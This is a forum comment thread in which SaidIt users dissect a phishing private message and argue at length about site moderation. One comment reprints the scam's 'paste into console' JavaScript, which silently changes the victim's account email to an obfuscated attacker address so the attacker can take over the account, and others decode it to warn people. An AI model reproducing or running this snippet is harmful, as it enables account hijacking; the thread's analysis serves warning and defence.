all 62 comments

[–]LarrySwinger2 12 insightful - 4 fun12 insightful - 3 fun13 insightful - 4 fun -  (18 children)

Don't do what it says.

It's obviously a phishing message. On his profile it says:

saiditter for 5 hours

It's clearly from an adversary, that's why you didn't get it from /u/magnora7. The instructions will change the code such that the form will send the information to woridi5084@0pppp.com, so that they have your login credentials. Good that you're bringing it to people's attention.

[–][deleted]  (5 children)

[removed]

    [–]LarrySwinger2 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 2 fun -  (3 children)

    Right, well spotted.

    [–][deleted] 3 insightful - 7 fun3 insightful - 6 fun4 insightful - 7 fun -  (2 children)

    That's Prince Watobi Oridi. Great guy. Probably has some money for Jason.

    [–]RightousBob 6 insightful - 9 fun6 insightful - 8 fun7 insightful - 9 fun -  (1 child)

    Business relation of yours?

    [–][deleted] 4 insightful - 3 fun4 insightful - 2 fun5 insightful - 3 fun -  (0 children)

    Not yet.

    Sweet deals on Wakanda beachfront property.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    Looks like a spam email to me. Adding a bunch of random characters and them removing them is a way hackers try to obfuscate their code so you don't know what's going on.

    [–][deleted] 7 insightful - 2 fun7 insightful - 1 fun8 insightful - 2 fun -  (0 children)

    Yes, it's definitely a scam. It'll give the hacker the ability to change your password, and you won't be able to get back into your account.

    [–]JasonCarswell[S] 4 insightful - 3 fun4 insightful - 2 fun5 insightful - 3 fun -  (5 children)

    I forgot to check the user's age.

    /u/one1won also noticed it:

    https://saidit.net/s/SaidIt/comments/7pam/is_this_for_real/

    Beat me to it. We need to upvote these posts to the top.

    On one level I'm glad I'm not overreacting and delusion and I'm glad I'm not being singled out.

    But I'm afraid that anyone might actually fall for it.

    [–]Tom_Bombadil 7 insightful - 3 fun7 insightful - 2 fun8 insightful - 3 fun -  (3 children)

    On one level I'm glad I'm not overreacting and delusion and I'm glad I'm not being singled out.

    Actually, I'm off the opinion that you are overreacting to everything related to M7.

    I don't think you're delusional though.

    Most of your comments seem to be intentionality worded as if you wanted to create mistrust in the community.

    Something akin to infiltration and controlled opposition.

    IDK.

    [–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (2 children)

    Actually, I'm off the opinion that you are overreacting to everything related to M7.

    The fucker banned me - for his own fucking mess. Sure I could have gone all Medieval on him but I don't need to.

    It was not my intention from the beginning to have things play out as they did, however, I did mean to bring back DioJr or get some serious fucking answers - while also exposing M7 and the profound cracks in the foundation that he refuses to work on. Through my focus and momentum my plan emerged only a few weeks ago and played out more or less as intended, as it was obvious it could and should not continue forever - and more importantly we have other plans to evolve beyond SaidIt while also continuing with SaidIt, whether M7 plays along or not.

    The emperor has been exposed. That doesn't mean we need to burn down the city. In fact I'm working on projects to help build and unify the community, internally and externally. Typing them up properly takes for fucking ever.

    I don't think you're delusional though.

    That's good. Yes, I was too trigger-happy in the OP title to blame M7. I can admit it. I was a little to paranoid - for good reasons. Today is the first time I'd seen anything like this too. Maybe you've seen it before?

    Most of your comments seem to be intentionality worded as if you wanted to create mistrust in the community.

    Wrong. Only M7. We can not trust the judgement of magnora7 who's being consoled by Chipit who has lied repeatedly and is a stupid tribalist shill, paid or not. M7 feels like he's being ganged up on because he's being as dense as a brick wall - then he seeks solace in the only friendly words that come his way. But worse is his stupid fucking "logic" that banned DioJr, me, and Musky. If I was still in protest mode I'd go off on that more, but I'm working on several new things.

    As always the community remains good, bad, and ugly and those who have earned my trust remain in high regard.

    We obviously have problems, but we're working on solutions. So in this spirit I mean to leave the drama behind while never forgetting and remaining focused on solutions. Help me do that by not bringing it up anymore and compelling me to explain/defend myself.

    Something akin to infiltration and controlled opposition.

    I can understand how you might view it that way. It's a valid viewpoint. Can you see it from my view? The management has been problematic for years, and has now only been lightly exposed. Long fed up, many of the workers are organizing into a cooperative - except it's actually a decentralized federation.

    IDK.

    I think you do know. And you do know me. And you remain high in my regard.

    Passive-aggressively suggesting that I may be a controlled op doesn't make it true and it doesn't make the M7 nonsense any more tolerable, nor will it ever go away unless he changes - a slim to none chance. We don't need to grin and bear it but we should peaceably tolerate it for a while longer until things are properly set up and we can all be free - without grudges and with much gratitude. Some seem eager to pull the trigger already, but I think we need to take time and do it properly and in the long run we'll have greater success, broader appeal, and a more secure future. Further, I still believe SaidIt has a vital role to play in the future too.

    The community must be mended, must get strong, and need not reside in one location under one owner. This is one of my primary projects until it's stable, then I'll focus on the other projects.

    [–]Tom_Bombadil 7 insightful - 2 fun7 insightful - 1 fun8 insightful - 2 fun -  (1 child)

    I think you do know. And you do know me.

    Do I?

    I know you about as well as I know M7, or the nigerian prince that created this overreaction.

    At least they don't appear to trust internet forums with their actual names.

    Your repeated public attacks don't make any sense given there current isn't a reasonable alternative platform.

    You're discussing significant changes to the site, but I don't see anyone else calling for these changes...

    It's worth stating that there aren't any successful examples of the type of site you are proposing, so it appears to me like a plan to fail.

    However, rather than create the change you want and prove it can succeed; you're trying to modify a currently successful site.

    Notably, the only one that is still functioning.

    You're far from stupid, so none of this makes sense.

    Unless, we look at this from a different angle. It is all quite reasonable if you are actually controlled opposition.

    Then everything makes perfect sense.

    I'm on the fence on this one, because it's difficult to know with any certainty.

    However, it's well within the realms of probability.

    You haven't done anything to upset me personally. This isn't a personal attack. I still consider you a semi-anonomous internet friend. That is, to the extent that we are aligned in our interests of chipping away at the propaganda and bullshit that has captured the planet.

    However, if our formerly mutual interests are in fact divergent, then our friendship is mere sentimentally, and can easily obfuscate reality.

    I would like to think you are not controlled opposition, but It would be foolish to continue to completely ignore this possibility.

    So, I'm putting it out there as a possibility.

    Hopefully, you can understand the rationale behind this statement.

    I would expect you to call attention to my actions if the situation were reversed.

    Edit: Fun fact; "Tom" is nigerian for "Prince".

    [–]JasonCarswell[S] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

    Do I?

    You tell me. Am I one to silently tolerate injustice from anyone with power?

    I know you about as well as I know M7, or the nigerian prince that created this overreaction.

    That make me sad. M7 is notoriously secretive. I am not. You know my real name, what I look like, etc. Soon you may even get to know me through video if my LeverMind Variety Show concept gets elected as one of my main projects (more on that soon).

    At least they don't appear to trust internet forums with their actual names.

    I can't speak for others or why they need anonymity. Maybe I will live to regret not being more "secure". It's the sad state of the world, and for my part I won't play into that aspect.

    Your repeated public attacks don't make any sense given there current isn't a reasonable alternative platform.

    That you know of. Yet. As I stated, everyone had to wake up to the cracks in the foundation. When a reasonable alternative platform arises people will naturally be slow to migrate. Now there's less reason to be slow or hesitant. Was it all worth it? To be determined.

    You're discussing significant changes to the site, but I don't see anyone else calling for these changes...

    Recently I've proposed changes to this site's management only. No significant changes to the code will ever come. I've made lists of ideas for this forum and very few have been seriously considered. I've even proposed raising funds for code-bounties to get er done. Also recently, I've proposed a next-step migration to Lemmy/Lenny, while also proposing ideas for a next-gen forum with radical concepts from the ground up.

    1) You aren't looking very hard. 2) You don't need to see them, nor their private messages. We love you but obviously you're not too supportive yet. I can't speak for them yet but if you're interested we may invite you. I've been busy/procrastinating rebooting my fucked up box so I can install Session. I'm not sharing their names on purpose. I keep asking them to be open, as I am, but they fear consequences. Perhaps justifiably. We've already lost a few good ones. We don't need more gone.

    It's worth stating that there aren't any successful examples of the type of site you are proposing, so it appears to me like a plan to fail.

    LOL. I don't need examples of what has already worked if I'm going to break new ground.

    I also don't expect it to fly without any hitches either. Fail, fail better, then succeed.

    Now who's being negative?

    However, rather than create the change you want and prove it can succeed; you're trying to modify a currently successful site.

    Multi-wrong. The changes are being created, and we will struggle and persevere and succeed. I'm not trying to modify SaidIt, though I was trying to get M7 to evolve. "Currently successful site" is subjective and simplistic. I'm choosing to omit a whole multi-faceted series of critical rants here as they won't help anything.

    Notably, the only one that is still functioning.

    I'm not sure what you mean.

    There are other forums functioning. They don't have the same content and obviously different communities. So yes, SaidIt is currently the best that I'm aware of. I will never deny that until something IMO surpasses it. My praise of this site is a tribute to the exceptional efforts of M7 and D3 and everyone who's contributed here, including you. However, long ago the site stopped evolving and M7 has closed himself off. M7 has alienated many - even D3. The future is coming on fast and the looming chaos of this coming summer will distract from but never stop the technocracy. We must not rest on our laurels. The poverty, culture, gender, race, cyber, class war is upon us and they use 5GW and have armies of minions and control the money printing. You know this.

    I have exposed M7 only. Not even deeply. That's done. My goal was never to harm SaidIt nor the community, despite whatever collateral damage was done. I'm trying to move on. Can you let me/us all?

    Also I never want to have SaidIt disappear. SaidIt will always be our mother community. Not only is there utility in it, but there's a foundational history here - as well as a future. Perhaps it will remain the same or perhaps M7 will finally evolve. That's not up to me.

    You're far from stupid, so none of this makes sense.

    I try my best, and write ridiculously verbose posts and comments and PMs to avoid room for confusion. You are also far from stupid, so I don't understand why you can't see it or make sense of it. Others who are in our league can without problems or hesitation.

    Unless, we look at this from a different angle. It is all quite reasonable if you are actually controlled opposition.

    That's a big fucking "IF". That sounds as paranoid as M7. Yet, it's a valid viewpoint, and he should be paranoid speaking truth about power. But only to a reasonable point within the bounds of logic.

    Then everything makes perfect sense.

    Not really. Not at all - unless you completely disregard everything I've said - as well as everything everyone else has said on the matter too. Even most of the people who criticized me for persisting the drama so long (another valid view), could understand my reasons and supported those.

    I'm on the fence on this one, because it's difficult to know with any certainty.

    Very understandable. I stand by my actions. I also stand by my future plans. I aim to continue proving myself to our community and in time I hope you'll come to understand and regain your faith in me. It's not been easy for me either, though in some ways M7 actually made it much easier to see than we imagined possible.

    However, it's well within the realms of probability.

    Not really. I don't understand your bias and blindness, other than you are understandably loyal to M7. I've never said he's all bad or anything like that. So far as I can tell, M7 and I share in common 97% of our views on things.

    You haven't done anything to upset me personally. This isn't a personal attack. I still consider you a semi-anonomous internet friend. That is, to the extent that we are aligned in our interests of chipping away at the propaganda and bullshit that has captured the planet.

    Likewise.

    However, if our formerly mutual interests are in fact divergent, then our friendship is mere sentimentally, and can easily obfuscate reality.

    I've not diverged. I'm trying to evolve and prepare. Things will get worse before they get better. Drama on SaidIt got worse - now they can get better. At least for my part. I have no influence over STABs. I just hope others will help unify to be stronger as some of us take steps to evolve. Eventually we'll be sharing how folks can participate with their own instances too. IMO we should all have indie-servers.

    I would like to think you are not controlled opposition, but It would be foolish to continue to completely ignore this possibility.

    Sure, to you it may seem like a possibility. I accept that. If I really wanted to unleash hell I could have dug up all the shit I could on M7 to post endless examples. I could have posted them on many sites. I could have done lots of stuff. AND I could have actually attacked SaidIt - not just M7. The LXXX and today's phishing scam are bad enough - but they are idiots. I'm too busy thinking of solutions to bother coming up with, much less openly sharing, ways to sabotage SaidIt.

    Think about all the shit I did trying to build SaidIt. Sure, not all of it was expertly done, but I did my best. Even while banned I gave a PostIt with SaidIt.net and Corbett and stuff to the girl I got my groceries from (certainly not the first time). I redesigned the logo, the PoD, added SaidIt to Alternative.To, and wrote the InfoGalactic article. There's not a week that I don't share SaidIt on YouTube, and perhaps on average not a day.

    So, I'm putting it out there as a possibility.

    Anything's possible in the world of anon. Maybe Q-Anon is legit. (Not really.)

    I'm not anon. I have built up my reputation, my brand if you will, and I stand by it. I'm not rich so I can't buy my way out of anything. I'm rebuilding myself back up from the ashes of my Big Pharma disaster - slowly, and with purpose.

    Hopefully, you can understand the rationale behind this statement.

    I understand it but think it's ludicrous. I don't know why you're blind to my open motives.

    I would expect you to call attention to my actions if the situation were reversed.

    Indeed. I really do value your thoughts. Thank you for bothering to indulge me and the readers. By expressing doubts I can clear them up. You are not likely the only one.

    The post that was censored and got me banned was a plea to the community to call me out on my shit and/or call out M7 on his. The responses were diverse and all over the field - thus illustrating it's not a clear cut case of right and wrong. It was not even a polarizing binary tribal team thing either. It's very complex.

    Unfortunately because M7 censored it those discussions were squashed. We'll never know where they could have gone. And we'll never know what transpired with DioJr or others. Maybe they deserved being banned. Maybe not.

    That said, I'm/we're trying to moving on. We obviously have problems, but we're working on solutions.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    I'm thinking it was a bot who spammed random accounts hoping someone would fall for it.

    [–]JuliusCaesar225 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (4 children)

    I did post my password then hit control shift J but nothing happened, I never posted the code. Did they still get my login?

    [–][deleted] 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 2 fun -  (2 children)

    No, you have to run the code, and then they have to request a password change. Make sure your email hasn't been changed in preferences.

    u/eurowoman24

    [–][deleted]  (1 child)

    [deleted]

      [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

      Yw!

      [–][deleted] 7 insightful - 5 fun7 insightful - 4 fun8 insightful - 5 fun -  (1 child)

      OF COURSE IT'S AN ATTACK. Sigh.

      [–][deleted] 5 insightful - 5 fun5 insightful - 4 fun6 insightful - 5 fun -  (0 children)

      You'd have to be a literal rock to fall for this.

      [–]SaidOverRed 6 insightful - 4 fun6 insightful - 3 fun7 insightful - 4 fun -  (7 children)

      Lol. Can you stop the clickbait tactics? Seriously. It's getting annoying. Anyone else would just PM a screenshot to a mod (one you're not in a pissing contest with). The drama attempts bore me.

      [–]JasonCarswell[S] 1 insightful - 3 fun1 insightful - 2 fun2 insightful - 3 fun -  (6 children)

      It wasn't a click bait tactic. I was confused. I didn't know if I was the only one. I also didn't want anyone else to fall for it. I didn't know it would even get noticed as most of my posts, like everyone else's get lost to time. Yes, I now regret including M7's name in the title, though at the time I thought he should see it.

      Turns out one1won beat me to it by a couple hours with theirs "Is this for real?" (complete coincidence) but theirs doesn't even explain what it is. Then Chipit made "Scam Warning...". Who knows how many other posts there are on this that didn't get upvoted.

      I do have one more intentional click-bait titled series that I've been working on for months. It's not about drama. It's about moving forward and it explains some things, is about building community, offers choices, and helps determine my destiny with our community's help. Feel free to participate or piss on it as you see fit.

      [–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (5 children)

      You're either extremely dumb or of terribly ill faith. Sorry but those are the only 2 options regarding this whole topic and your post above.

      [–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (4 children)

      You don't define me.

      [–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (3 children)

      No, you did it yourself, using that post I commented on. I only described the terms in which you define yourself through your messages.

      [–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

      Which post?

      Be more specific and clear.

      Calling me dumb or of ill faith is vague and obvious nonsense.

      By your definition, limited to only 2 options means you aren't imaginative or capable enough to consider there may be more to things.

      [–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (1 child)

      First, you ask "is this for real?" and "If it's some kind of attack, this is next level". You'd have to be low IQ to not IMMEDIATELY realize it makes no sense, and that it is "some kind of attack". Upon more attentive perusal of the PM, it becomes immediately obvious that it is not "next level" at all.

      It wasn't a click bait tactic. I was confused.

      Easily at that. My problem is that you copied and pasted the whole thing, including the code and links, basically INCREASING the possibility that somebody might fall for it, all under the guise of asking if it's legit or not. That seems like ill faith to me, unless you are too stupid to realize what you are doing.

      Sorry, I don't see a 3rd option.

      [–]JasonCarswell[S] 1 insightful - 3 fun1 insightful - 2 fun2 insightful - 3 fun -  (0 children)

      If you hadn't noticed there was some drama and I got banned. If M7 was pulling some nonsense on me I needed to know. It obviously looked like a scam. I didn't have confirmation when I posted it or I wouldn't have. "Is this for real?" was not only used by me but also by one1won.

      Since we haven't seen it before on SaidIt then yes, it is their next level.

      INCREASING the possibility that somebody might fall for it

      Now who's being daft. "If this is some kind of attack" should have been fair warning.

      Sorry, I don't see a 3rd option.

      Sorry, I can't help you anymore. Now fuck off.

      [–][deleted] 6 insightful - 3 fun6 insightful - 2 fun7 insightful - 3 fun -  (2 children)

      Yo /u/theameliamay /u/fred_red_beans can we ban this saidLT account please

      [–]fred_red_beans 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 2 fun -  (1 child)

      saidLT

      done

      [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

      nice

      [–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (12 children)

      Why is it so anonymous? Why isn't it from /u/magnora7? When did /u/magnora7 suddenly decide to adopt a "SaidIt Team"? Sure he now has a few helpers but a "team"? That's a term I've been throwing around.

      What does this do? (broken into 4 smaller chunks rather than one long line):

      Paste this: d=document;d.getElementsByName('email')[0]
      .value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
      ('x', '');d.getElementsByTagName('form')[1]
      .submit();location.href="https://www.saidit.net/";
      Hit enter. You've just kicked the hacker out of your account!

      [–][deleted]  (4 children)

      [removed]

        [–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 3 fun -  (3 children)

        No, it just changes your email address, which allows the hacker to change your password. I don't think it actually works, though, after analyzing the code, because the attacker assumed the form uses POST, which it doesn't.

        Regardless, I would never run that code if I was you, and if you did: make sure your email ain't been changed.

        [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (2 children)

        because the attacker assumed the form uses POST, which it doesn't

        It might be POST compatible. Once upon a time young lady, there was no javascript.

        [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

        I tried it by substituting their email for one of my own, and it didn't work.

        [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

        It's a dude bro. A dude who roleplays having a female penis.

        [–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 2 fun -  (0 children)

        It's JavaScript code. Do not run it!

        'wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll('x', '') returns woridi5084@0pppp.com That's the attacker's email address — looks like a scam address to me. They probably obfuscated it so they wouldn't get reported to their email provider, and so you wouldn't immediately recognize it as an email address.

        d.getElementsByName('email')[0].value sets your email address to the email above, but doesn't actually change it.

        d.getElementsByTagName('form')[1].submit() submits the form to change your email. I don't think that actually works, BTW, so if you did run the code: you're probably safe. (But still make sure your email hasn't been changed!) That page didn't use POST when I set my email address, so I think it just uses JavaScript.

        location.href="https://www.saidit.net/"; Just redirects you to the home page.

        Even if the code did work: this is a terrible way to hack into someone's account, since I don't know anyone who would actually paste a block of code into their console... you'd have to be a literal rock to fall for it.

        But if yall get so'm like this again: send me the code and I'll figure out what it does no matter how hard they try to obfuscate it.

        [–]LarrySwinger2 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 2 fun -  (5 children)

        Please simply remove the code you pasted, in case anyone tries. I hope you haven't done what it says. If you have: please change your password ASAP.

        [–]JasonCarswell[S] 3 insightful - 3 fun3 insightful - 2 fun4 insightful - 3 fun -  (0 children)

        Removed from the OP, but I left it, broken above for analysis.

        [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (3 children)

        And make sure your email address hasn't been changed u/JasonCarswell.

        [–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

        I didn't plug it in. The whole thing seemed beyond fishy. My reason for immediately shouting it out was to warn people. Plus I wondered if it had come up before to others.

        [–]send_nasty_stuff 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

        I got a message as well. It must have gone out to most of saidit.

        [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

        Great! I don't think anyone would actually fall for it, though (even if the code worked).

        [–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (7 children)

        Who else has received this private message?

        [–]one1won 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (2 children)

        [–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (1 child)

        /u/one1won also noticed it:

        https://saidit.net/s/SaidIt/comments/7pam/is_this_for_real/

        Beat me to it. We need to upvote these posts to the top.

        On one level I'm glad I'm not overreacting and delusion and I'm glad I'm not being singled out.

        But I'm afraid that anyone might actually fall for it.

        [–]one1won 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

        Ditto. I lurk & read magnora7 relay the massive spamming and trolling Saidit admins deal with.

        [–]NutterButterFlutter 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

        I received it too!

        https://imgur.com/a/vHjrc0I

        [–]Dragonerne 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (1 child)

        I got it. Seems I am a part of a club. I didn't follow the instructions but changed my pw anyway

        [–]JasonCarswell[S] 2 insightful - 4 fun2 insightful - 3 fun3 insightful - 4 fun -  (0 children)

        They think we're in The Gullible Club but I sold my membership for a broken air conditioner, a cactus in a pot, two magic beans, and a tab of acid. There were instructions for how they all fit together but I lost them, and one of the beans.

        [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

        I got it too and immediately reported it. The sender's account age read "2 hours" at that time.

        [–]blowininthewind 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (4 children)

        does saidit have a csrf token? i did not see one on that reset site.

        [–]JasonCarswell[S] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (3 children)

        I don't know what that is. Maybe ask an admin?

        [–]blowininthewind 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (2 children)

        google it

        [–]JasonCarswell[S] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (1 child)

        csrf token

        https://duckduckgo.com/?q=csrf+token

        I still don't know what it is. Greek to me. Is it crypto? Is it security? I don't get it.

        [–]blowininthewind 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

        it's a defense measure against various types of impersonation and / or spoofing attaacks online. i can't think of exactly how this is done, but csrf is pretty standard security measure for websites (i used to have this personal site and i have a csrf token because it's a given by django). but it doesn't look like saidit got that on certain pages, and op's problem is kinda related to that kinda attack, at least it's the first thing i thought about checking. so i'm a bit worried.

        [–]send_nasty_stuff 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (3 children)

        I got one as well. Didn't follow any links but I did change my password (figured it couldn't hurt)

        [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

        Do you use a password manager? I went through all my old passwords after an attack on my phone and changed them all, used a password manager to make ungodly complicated individual passwords for each site. It does occur to me however, there is one major point of vulnerability there.

        [–]send_nasty_stuff 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 2 fun -  (1 child)

        Who doesn't use a password manager? This looked like a saidit attack though so I didn't do anything beside change my saidit password.

        [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

        I didn't always use a password manager, when I was younger I was much better at remembering them. Then for a while I kept an encrypted file with a password list, not so different from the function of a password manager but locally.

        Yeah, this was just a lame phishing attack. I'd be surprised if it worked on anyone.

        [–]christnmusicreleases 2 insightful - 3 fun2 insightful - 2 fun3 insightful - 3 fun -  (0 children)

        It's phishing. As a precaution, I verified my current email and changed my password, and logged out from all devices just to be sure.

        [–]JasonCarswell[S] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

        My screenshot and second time (maybe third) using SaidIt's upload to Imgur. Nice that it works. Very handy.